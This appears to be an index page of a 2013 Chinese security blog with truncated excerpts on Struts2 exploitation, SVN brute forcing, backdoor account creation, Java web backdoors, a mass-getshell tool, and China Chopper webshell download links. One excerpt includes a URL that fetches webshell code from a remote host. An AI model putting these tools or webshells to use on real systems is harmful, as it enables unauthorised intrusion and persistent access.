Security(80 篇文章)

Java login SSH

yzmm

2013年12月7日 12:43

596 阅读

Java连接并登陆SSH（需要用到的jar包-ganymed-ssh2-build210.jar）： package org.javaweb.util; import java.io.IOException; import ch.ethz.ssh2.Connection; public class Ssh { public boolean login(String host,int port,St...

阅读全文

无需数据库密码-JNDI数据源方式执行Sql语句

yzmm

Tools

2013年12月5日 19:05

592 阅读

0 评论

如果只找到数据源的情况下可以直接用数据源的名连接数据库，不需要找到具体的密码。 <%@page import="java.io.File"%> <%@page import="java.io.FileWriter"%> <%@page import="java.io.BufferedWriter"%> ...

阅读全文

Apache Roller博客Struts2命令执行漏洞

Anonymous

Web Applications

2013年12月5日 17:04

561 阅读

0 评论

在exp有个Apache Roller OGNL Injection：http://www.exploit-db.com/exploits/29859/ 好牛B的感觉，下载了几个Apache Roller的版本，好吧。 roller5.00:struts2-core-2.2.1.jar roller5.01:struts2-core-2.2.3.1.jar 剩下的不许多少Struts getshe...

阅读全文

net user

yzmm

Tools

2013年11月30日 19:56

600 阅读

0 评论

#include <windows.h> #include <lm.h> #pragma comment(lib,"netapi32") int main() { USER_INFO_1 u; DWORD dwError=0; u.usri1_name=L"tomcat"; u.usri1_password=L"admin8...

阅读全文

Java 实现登录SVN(可3690端口爆破)

yzmm

Documents

2013年11月30日 14:18

812 阅读

0 评论

很多扫描SVN工具都是扫描的.svn文件，不能通过端口去扫描SVN。Java有SVN的扩展库，已实现了SVN客户端的所有功能。 SVN有个未授权访问问题，默认不开启。一般人都会设置必须登录才能访问资源，但不排除少部分偷懒的人。其次就是SVN弱口令了。 svnserve.conf： authz-db = authz 去年写了个简单的SVN客户端放着也没用。下面给的一个认证的demo程序，需要jar包...

阅读全文

[原创] 攻击JavaWeb应用[1-8]

yzmm

Documents

2013年11月28日 15:47

670 阅读

0 评论

最新更新了后门篇，记录了下JavaWeb后门相关东东。攻击JavaWeb应用[1-8].pdf 攻击JavaWeb应用[1-8].doc 内容：攻击JavaWeb应用[1]-JavaEE 基础攻击JavaWeb应用[2]-CS交互安全攻击JavaWeb应用[3]-SQL注入[1] 攻击JavaWeb应用[4]-SQL注入[2] 攻击JavaWeb应用[5]-MVC安全攻击JavaWeb应...

阅读全文

两种“新型”的javaweb后门(jspx和Java Logger)

yzmm

Tools

2013年11月28日 15:41

1029 阅读

0 评论

关于JavaWeb后门问题一直以来都比较少，而比较新奇的后门更少。在这里我分享两个我最近搞的比较有意思的JavaWeb后门给大家玩。一个常见或者比较普通的后门很容易就会被拦截或者被发现，但不知道有朋友了解下面两种后门没？ 1：jspx后门在如今的web应用当中如果想直接传个jsp已经变得比较难了，但是如果只限制了asp、php、jsp、aspx等这些常见的后缀应该怎样去突破呢？我在读tomcat...

阅读全文

Struts2漏洞批量GetShell到MongoDb数据库

yzmm

Tools

2013年11月28日 15:33

930 阅读

2 评论

这个很简单的，改下main的str的关键字就可以自动getshell并倒入mongodb数据库。 [只需要添加jsoup和mongodb的jar包] import java.io.IOException; import java.net.URL; import java.net.URLConnection; import java.net.UnknownHostException; import ...

阅读全文

JavaWeb随机后门?

yzmm

Tools

2013年11月28日 15:15

708 阅读

0 评论

我的思路是先从远程读取要生成的shell内容，然后把shell藏在WEB-INF下shell的名字和长度也都随机生成。比如：不过就算藏在WEB-INF下也会被发现，干脆用一次就删一次？这样不会在任何目录下留下Shell。菜刀链接：http://localhost/Demo2/new.jsp?url=http://xsser.me/caidao/css.jsp <%@ page langu...

阅读全文

菜刀Jsp脚本最终更新版

yzmm

Tools

2013年11月28日 15:13

1014 阅读

0 评论

脚本下载地址： JSP脚本：http://xsser.me/caidao/css.jsp Jspx脚本：http://xsser.me/caidao/jspx.jspx Jspf脚本：http://xsser.me/caidao/css.jspf 详情：http://xsser.me/caidao/1.txt 修复上一版BUG：  1、修复Oracle无setCatalog的BUG。&n...

阅读全文

PHP & Java

Security(80 篇文章)